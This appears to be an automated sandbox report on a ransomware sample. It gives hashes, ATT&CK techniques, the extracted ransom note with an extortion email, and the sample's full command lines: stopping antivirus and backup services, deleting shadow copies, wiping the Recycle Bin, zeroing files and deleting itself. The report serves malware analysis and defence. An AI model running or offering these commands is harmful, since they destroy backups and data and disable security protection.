1c83ff2394da76e6296e6ad72c40dbde107704a711bbd08b633c57587230ccf8

Analysis

max time kernel
139s
max time network
76s
platform
windows7_x64
resource
win7v200430
submitted
18-06-2020 02:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

90a909a4508aa899b4be372e7de6f500.exe
Size

62KB
MD5

90a909a4508aa899b4be372e7de6f500
SHA1

7bb201923d7055c149858d087c0a44ab9530536e
SHA256

1c83ff2394da76e6296e6ad72c40dbde107704a711bbd08b633c57587230ccf8
SHA512

57b732ac3827878c81ed45e26001695c42240b6eb16d4c9d0ecd34d41ede0d598983c156a5c22c8a5f79e81437ed308e0414571cda1c0725ab7b2b3ef9f683cf

Score

10^/10

ransomware spyware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\DEAL_FOR_ACCESS_TO_YOUR_FILES.txt

Ransom Note

*** WARNING *** Important Files In This Machine Has LOCKED. Your Files ONLY Can Recover By Special Unlocker. Important And Private Documents Also COPIED. After This Message Time For Payment Is Limited. After Time Limit Next Payment Will Be x2 Next Step Is Publish Files And Document. You Can Test 1 File (Max. 2MB) To Unlock l1u1t1@secmail.pro Key Identifier: ge80jh5VU8BIcj3mH8WfI4wvcFexcohH13mXMfpWXS4b2d4IoVxuO+SXm24ob3A+mboN+DfDVNaQxRC7O8uj6diE9iuaDZw7/RFbfeIEdYWwZK8Mt/LMrn4bEobm20dK6wJTcibW2I4ALPLKRdoW0PYkHDEAsU1d7MXysMmGoBfYWh72Nx8j3J8oFbdI5TUa7z3YAtqEFFfy8U0K9EJf2TUKw2jvZMkW3VzvV18j0m9nwpFm1I8WI62xdu8qzAlYbbd5BjAC6L30iXu5m3SfYWtvIp7ZdcogMlHes3NZegPb0FCyK4PK0TTFuZshuETcB/91BcGNAxsKlax4Mysfbw==

Emails

l1u1t1@secmail.pro

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1464 cmd.exe

pid	process
1464	cmd.exe

Drops startup file 1 IoCs

Processes:

90a909a4508aa899b4be372e7de6f500.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	90a909a4508aa899b4be372e7de6f500.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Enumerates connected drives 3 TTPs 18 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
1108	vssadmin.exe
744	vssadmin.exe
1508	vssadmin.exe
1520	vssadmin.exe
1856	vssadmin.exe
1488	vssadmin.exe
364	vssadmin.exe
1828	vssadmin.exe
1320	vssadmin.exe
1596	vssadmin.exe
1560	vssadmin.exe
1936	vssadmin.exe
1960	vssadmin.exe
1848	vssadmin.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

1852 taskkill.exe
1324 taskkill.exe
1000 taskkill.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

1612 notepad.exe
Runs net.exe
Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

828 PING.EXE
1544 PING.EXE
1696 PING.EXE
288 PING.EXE

pid	process
1852	taskkill.exe
1324	taskkill.exe
1000	taskkill.exe

pid	process
1612	notepad.exe

pid	process
828	PING.EXE
1544	PING.EXE
1696	PING.EXE
288	PING.EXE

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

90a909a4508aa899b4be372e7de6f500.exetaskkill.exetaskkill.exetaskkill.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	1312	90a909a4508aa899b4be372e7de6f500.exe
Token: SeDebugPrivilege	1852	taskkill.exe
Token: SeDebugPrivilege	1324	taskkill.exe
Token: SeDebugPrivilege	1000	taskkill.exe
Token: SeBackupPrivilege	2004	vssvc.exe
Token: SeRestorePrivilege	2004	vssvc.exe
Token: SeAuditPrivilege	2004	vssvc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

90a909a4508aa899b4be372e7de6f500.exe

pid process

1312 90a909a4508aa899b4be372e7de6f500.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

90a909a4508aa899b4be372e7de6f500.exe

pid process

1312 90a909a4508aa899b4be372e7de6f500.exe

pid	process
1312	90a909a4508aa899b4be372e7de6f500.exe

pid	process
1312	90a909a4508aa899b4be372e7de6f500.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

90a909a4508aa899b4be372e7de6f500.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 1312 wrote to memory of 1480	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 1480	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 1480	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 1480	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1480 wrote to memory of 544	1480	net.exe	net1.exe
PID 1480 wrote to memory of 544	1480	net.exe	net1.exe
PID 1480 wrote to memory of 544	1480	net.exe	net1.exe
PID 1480 wrote to memory of 544	1480	net.exe	net1.exe
PID 1312 wrote to memory of 1012	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 1012	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 1012	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 1012	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1012 wrote to memory of 1612	1012	net.exe	net1.exe
PID 1012 wrote to memory of 1612	1012	net.exe	net1.exe
PID 1012 wrote to memory of 1612	1012	net.exe	net1.exe
PID 1012 wrote to memory of 1612	1012	net.exe	net1.exe
PID 1312 wrote to memory of 240	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 240	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 240	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 240	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 240 wrote to memory of 1068	240	net.exe	net1.exe
PID 240 wrote to memory of 1068	240	net.exe	net1.exe
PID 240 wrote to memory of 1068	240	net.exe	net1.exe
PID 240 wrote to memory of 1068	240	net.exe	net1.exe
PID 1312 wrote to memory of 1088	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 1088	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 1088	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 1088	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1088 wrote to memory of 1520	1088	net.exe	net1.exe
PID 1088 wrote to memory of 1520	1088	net.exe	net1.exe
PID 1088 wrote to memory of 1520	1088	net.exe	net1.exe
PID 1088 wrote to memory of 1520	1088	net.exe	net1.exe
PID 1312 wrote to memory of 1668	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 1668	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 1668	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 1668	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1668 wrote to memory of 1360	1668	net.exe	net1.exe
PID 1668 wrote to memory of 1360	1668	net.exe	net1.exe
PID 1668 wrote to memory of 1360	1668	net.exe	net1.exe
PID 1668 wrote to memory of 1360	1668	net.exe	net1.exe
PID 1312 wrote to memory of 1764	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 1764	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 1764	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 1764	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1764 wrote to memory of 1824	1764	net.exe	net1.exe
PID 1764 wrote to memory of 1824	1764	net.exe	net1.exe
PID 1764 wrote to memory of 1824	1764	net.exe	net1.exe
PID 1764 wrote to memory of 1824	1764	net.exe	net1.exe
PID 1312 wrote to memory of 1836	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 1836	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 1836	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 1836	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1836 wrote to memory of 1844	1836	net.exe	net1.exe
PID 1836 wrote to memory of 1844	1836	net.exe	net1.exe
PID 1836 wrote to memory of 1844	1836	net.exe	net1.exe
PID 1836 wrote to memory of 1844	1836	net.exe	net1.exe
PID 1312 wrote to memory of 1788	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 1788	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 1788	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1312 wrote to memory of 1788	1312	90a909a4508aa899b4be372e7de6f500.exe	net.exe
PID 1788 wrote to memory of 1768	1788	net.exe	net1.exe
PID 1788 wrote to memory of 1768	1788	net.exe	net1.exe
PID 1788 wrote to memory of 1768	1788	net.exe	net1.exe
PID 1788 wrote to memory of 1768	1788	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\90a909a4508aa899b4be372e7de6f500.exe
"C:\Users\Admin\AppData\Local\Temp\90a909a4508aa899b4be372e7de6f500.exe"
1⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1312

C:\Windows\SysWOW64\net.exe
"net.exe" stop avpsus /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1480

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop avpsus /y
3⤵
PID:544

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeDLPAgentService /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1012

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
3⤵
PID:1612

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfewc /y
2⤵
- Suspicious use of WriteProcessMemory
PID:240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
3⤵
PID:1068

C:\Windows\SysWOW64\net.exe
"net.exe" stop BMR Boot Service /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1088

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
3⤵
PID:1520

C:\Windows\SysWOW64\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1668

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
3⤵
PID:1360

C:\Windows\SysWOW64\net.exe
"net.exe" stop DefWatch /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1764

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
3⤵
PID:1824

C:\Windows\SysWOW64\net.exe
"net.exe" stop ccEvtMgr /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1836

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
3⤵
PID:1844

C:\Windows\SysWOW64\net.exe
"net.exe" stop ccSetMgr /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1788

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
3⤵
PID:1768

C:\Windows\SysWOW64\net.exe
"net.exe" stop SavRoam /y
2⤵
PID:652

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
3⤵
PID:864

C:\Windows\SysWOW64\net.exe
"net.exe" stop RTVscan /y
2⤵
PID:984

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
3⤵
PID:616

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBFCService /y
2⤵
PID:1316

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
3⤵
PID:1624

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBIDPService /y
2⤵
PID:1592

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
3⤵
PID:1636

C:\Windows\SysWOW64\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
2⤵
PID:1620

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
3⤵
PID:1896

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBCFMonitorService /y
2⤵
PID:1948

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
3⤵
PID:1888

C:\Windows\SysWOW64\net.exe
"net.exe" stop YooBackup /y
2⤵
PID:1892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
3⤵
PID:1968

C:\Windows\SysWOW64\net.exe
"net.exe" stop YooIT /y
2⤵
PID:1980

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooIT /y
3⤵
PID:2028

C:\Windows\SysWOW64\net.exe
"net.exe" stop zhudongfangyu /y
2⤵
PID:856

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
3⤵
PID:1200

C:\Windows\SysWOW64\net.exe
"net.exe" stop stc_raw_agent /y
2⤵
PID:1104

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
3⤵
PID:1484

C:\Windows\SysWOW64\net.exe
"net.exe" stop VSNAPVSS /y
2⤵
PID:1580

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
3⤵
PID:1572

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
2⤵
PID:836

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
3⤵
PID:1612

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
2⤵
PID:848

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
3⤵
PID:324

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
2⤵
PID:1064

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
3⤵
PID:1524

C:\Windows\SysWOW64\net.exe
"net.exe" stop veeam /y
2⤵
PID:1376

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop veeam /y
3⤵
PID:1380

C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
2⤵
PID:1816

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
3⤵
PID:1828

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
2⤵
PID:1792

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
3⤵
PID:1784

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
2⤵
PID:1768

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
3⤵
PID:568

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
2⤵
PID:368

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
3⤵
PID:1516

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
2⤵
PID:300

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
3⤵
PID:1624

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
2⤵
PID:1256

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
3⤵
PID:1600

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
2⤵
PID:1564

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
3⤵
PID:1568

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
2⤵
PID:1908

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
3⤵
PID:1900

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
2⤵
PID:1984

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
3⤵
PID:1972

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
2⤵
PID:2032

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
3⤵
PID:1308

C:\Windows\SysWOW64\net.exe
"net.exe" stop CASAD2DWebSvc /y
2⤵
PID:1200

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
3⤵
PID:1492

C:\Windows\SysWOW64\net.exe
"net.exe" stop CAARCUpdateSvc /y
2⤵
PID:1084

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
3⤵
PID:544

C:\Windows\SysWOW64\net.exe
"net.exe" stop sophos /y
2⤵
PID:1060

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophos /y
3⤵
PID:1612

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
2⤵
PID:1616

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:1068

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
2⤵
PID:1528

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
2⤵
PID:1380

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1852

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1324

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1000

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
2⤵
- Interacts with shadow copies
PID:1936

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
2⤵
- Interacts with shadow copies
PID:1960

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
2⤵
- Interacts with shadow copies
PID:1108

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:364

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:744

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1856

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1828

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1320

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1596

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1560

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1488

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1508

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1520

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
2⤵
- Interacts with shadow copies
PID:1848

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
2⤵
PID:1640

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpDD91.bat
2⤵
PID:1636

C:\Windows\SysWOW64\mountvol.exe
mountvol
3⤵
PID:1896

C:\Windows\SysWOW64\find.exe
find "}\"
3⤵
PID:1928

C:\Windows\SysWOW64\mountvol.exe
mountvol !freedrive!: \\?\Volume{ef8b9383-8b17-11ea-a5f6-806e6f6e6963}\
3⤵
PID:1932

C:\Windows\SysWOW64\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:828

C:\Windows\SysWOW64\mountvol.exe
mountvol !freedrive!: \\?\Volume{ef8b9384-8b17-11ea-a5f6-806e6f6e6963}\
3⤵
PID:1484

C:\Windows\SysWOW64\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:1544

C:\Windows\SysWOW64\mountvol.exe
mountvol !freedrive!: \\?\Volume{ef8b9387-8b17-11ea-a5f6-806e6f6e6963}\
3⤵
PID:748

C:\Windows\SysWOW64\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:1696

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\DEAL_FOR_ACCESS_TO_YOUR_FILES.txt
2⤵
- Opens file in notepad (likely ransom note)
PID:1612

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
2⤵
PID:1092

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
3⤵
- Runs ping.exe
PID:288

C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
3⤵
PID:920

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\90a909a4508aa899b4be372e7de6f500.exe
2⤵
- Deletes itself
PID:1464

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:1676

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2004

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1444

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tmpDD91.bat
MD5
1af2c796c268a8160d0d93e8866dc7b0

SHA1
6d786ee5bf9cb9b1da115ce6daffe1e7b5ef988f

SHA256
94e31962442ee5f22c9ff8f6539c214dabf49e1b672a91cb042e2c0c1369abc8

SHA512
af10c10ef2c7f976ebc52201d17c95cb2a5c433d39c7d722b0c1f56cb48fa27c07cf60e7de8c2d9974f6594212eb02568007da90e49ba3bca226efbe8943271e

Download Submit
C:\Users\Admin\AppData\Local\Temp\v.txt
MD5
311279e9ffc5d0b14e0a3e8e1f5e67f7

SHA1
7035a0280655bb36ca253f9fc83a53fc5d9b14c7

SHA256
eb0d4e5629e5316a18c24ab2920f49994e1467d840daa6e2cf5fed89049391cd

SHA512
50951d6d2c07ab493e1ebb82b34b219248a6e4f17866ee9b8502fdf96ec2d935f21dc837252cd5bc2362fc10a343da295942a13aa7a9217ce12c0965e1371349

Download Submit
C:\Users\Admin\Desktop\DEAL_FOR_ACCESS_TO_YOUR_FILES.txt
MD5
17828cc72b0df3a528da9436bbd3cfab

SHA1
64a9536158ea38a81d655651764b68f00bf5e623

SHA256
d746e3f79af6c814c5e590881e55f525d9391c71b64297d0e7906888f600730b

SHA512
8c357ab0ae373c99762a3771a0ce053453db078531bcd8a7ee191b53e9390f6b3e18282a95beffb78ace61750b3bcb2663d9e6c975157fb5d233e3e1284d0297

Download Submit
memory/240-4-0x0000000000000000-mapping.dmp

Download
memory/288-109-0x0000000000000000-mapping.dmp

Download
memory/300-54-0x0000000000000000-mapping.dmp

Download
memory/324-41-0x0000000000000000-mapping.dmp

Download
memory/364-82-0x0000000000000000-mapping.dmp

Download
memory/368-52-0x0000000000000000-mapping.dmp

Download
memory/544-69-0x0000000000000000-mapping.dmp

Download
memory/544-1-0x0000000000000000-mapping.dmp

Download
memory/568-51-0x0000000000000000-mapping.dmp

Download
memory/616-19-0x0000000000000000-mapping.dmp

Download
memory/652-16-0x0000000000000000-mapping.dmp

Download
memory/744-83-0x0000000000000000-mapping.dmp

Download
memory/748-102-0x0000000000000000-mapping.dmp

Download
memory/828-99-0x0000000000000000-mapping.dmp

Download
memory/836-38-0x0000000000000000-mapping.dmp

Download
memory/848-40-0x0000000000000000-mapping.dmp

Download
memory/856-32-0x0000000000000000-mapping.dmp

Download
memory/864-17-0x0000000000000000-mapping.dmp

Download
memory/920-111-0x0000000000000000-mapping.dmp

Download
memory/984-18-0x0000000000000000-mapping.dmp

Download
memory/1000-78-0x0000000000000000-mapping.dmp

Download
memory/1012-2-0x0000000000000000-mapping.dmp

Download
memory/1060-70-0x0000000000000000-mapping.dmp

Download
memory/1064-42-0x0000000000000000-mapping.dmp

Download
memory/1068-5-0x0000000000000000-mapping.dmp

Download
memory/1068-73-0x0000000000000000-mapping.dmp

Download
memory/1084-68-0x0000000000000000-mapping.dmp

Download
memory/1088-6-0x0000000000000000-mapping.dmp

Download
memory/1092-108-0x0000000000000000-mapping.dmp

Download
memory/1104-34-0x0000000000000000-mapping.dmp

Download
memory/1108-81-0x0000000000000000-mapping.dmp

Download
memory/1200-33-0x0000000000000000-mapping.dmp

Download
memory/1200-66-0x0000000000000000-mapping.dmp

Download
memory/1256-56-0x0000000000000000-mapping.dmp

Download
memory/1308-65-0x0000000000000000-mapping.dmp

Download
memory/1316-20-0x0000000000000000-mapping.dmp

Download
memory/1320-86-0x0000000000000000-mapping.dmp

Download
memory/1324-77-0x0000000000000000-mapping.dmp

Download
memory/1360-9-0x0000000000000000-mapping.dmp

Download
memory/1376-44-0x0000000000000000-mapping.dmp

Download
memory/1380-45-0x0000000000000000-mapping.dmp

Download
